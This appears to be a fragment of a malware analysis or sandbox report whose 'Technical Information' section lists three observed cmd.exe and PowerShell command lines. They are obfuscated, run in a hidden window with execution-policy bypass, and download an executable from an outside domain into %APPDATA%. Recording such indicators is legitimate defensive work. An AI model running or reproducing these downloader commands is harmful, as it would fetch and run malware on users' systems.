Technical Information
- '<SYSTEM32>\cmd.exe' /c pOwERsHELl -Ex bYpasS -NOp -w hiDdEn inVOKE-WebRequEsT -uri 'https://alexanu.com/vnvnomcry.exe' -ouTfIlE '%ApPdAtA%\vnomt.exe'...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex bYpasS -NOp -w hiDdEn inVOKE-WebRequEsT -uri 'https://alexanu.com/vnvnomcry.exe' -ouTfIlE '%APPDATA%\vnomt.exe' ; iNVOkE...
- '<SYSTEM32>\cmd.exe' /c pOwERsHELl -Ex bYpasS -NOp -w hiDdEn inVOKE-WebRequEsT -uri 'https://alexanu.com/vnvnomcry.exe' -ouTfIlE '%ApPdAtA%\vnomt.exe'...' (with hidden window)